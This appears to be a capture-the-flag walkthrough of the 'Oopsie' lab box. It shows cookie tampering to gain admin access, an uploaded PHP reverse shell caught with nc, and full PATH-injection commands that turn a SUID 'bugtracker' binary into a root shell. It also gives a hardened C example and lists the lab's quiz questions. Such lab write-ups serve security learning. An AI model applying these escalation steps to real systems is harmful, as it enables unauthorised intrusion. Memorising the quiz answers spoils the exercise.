$ oopsie.pwn()
A web application's login page at /cdn-cgi/login uses cookies for access control. By changing the role cookie and access ID to the admin's (34322), we gain access to a file upload feature. Uploaded PHP shells land in /uploads. Privilege escalation goes through a SUID binary that calls 'cat' without a full path, so PATH injection gives root.
Techniques
Open Ports
Terminal Session
# Browse to http://10.129.x.x
# Redirect reveals login at /cdn-cgi/login
# Intercept with Burp Suite — observe cookie:
# Cookie: user=34322; role=admin
# After modifying cookie to admin access ID 34322:
# Access to upload page at /uploads
# Upload PHP reverse shell → caught by nc listener
# Enumerate files owned by bugtracker group:
find / -group bugtracker 2>/dev/null
# /usr/bin/bugtracker → SUID binary
# bugtracker binary calls 'cat' without full path
# PATH injection:
export PATH=/tmp:$PATH
echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
/usr/bin/bugtracker
# → root shell!
[✓] Root shell obtained — flags captured!
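The root step works because a SUID program resolved 'cat' through the caller's PATH. As an added example (not the bugtracker source, which this page does not show), here is that weak call pattern beside a hardened one in C; the function names and the file argument are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Weak pattern (hypothetical helper): system() hands the string to /bin/sh,
 * which looks up "cat" in the caller-controlled PATH while the process still
 * runs with the SUID identity. The shell also interprets the argument. */
int show_file_weak(const char *path)
{
    char cmd[512];
    int status;

    if (snprintf(cmd, sizeof cmd, "cat %s", path) >= (int)sizeof cmd)
        return -1;
    status = system(cmd);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened pattern (hypothetical helper): no shell, absolute path to the
 * program, and a fixed environment instead of the one inherited from the
 * caller. "--" stops cat from reading the file name as an option. */
int show_file_hardened(const char *path)
{
    char *const argv[] = { "cat", "--", (char *)path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/cat", argv, envp);  /* never consults PATH */
        _exit(127);                      /* reached only if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: an empty device file, so nothing is printed. */
    return show_file_hardened("/dev/null");
}
```

The hardened function returns cat's exit status whatever PATH the caller exported, because execve() is given the absolute path and its own environment.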
Tasks (10)
What kind of tool can be used to intercept web traffic?
What is the path to the directory on the webserver that returns a login page?
What can be modified in Firefox to get access to the upload page?
What is the access ID of the admin user?
On uploading a file, what directory does that file appear in on the server?
What is the file that contains the password that is shared with the robert user?
What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
Regardless of which user starts running the bugtracker executable, what user's privileges will it use to run?
What does SUID stand for?
What is the name of the executable being called in an insecure manner?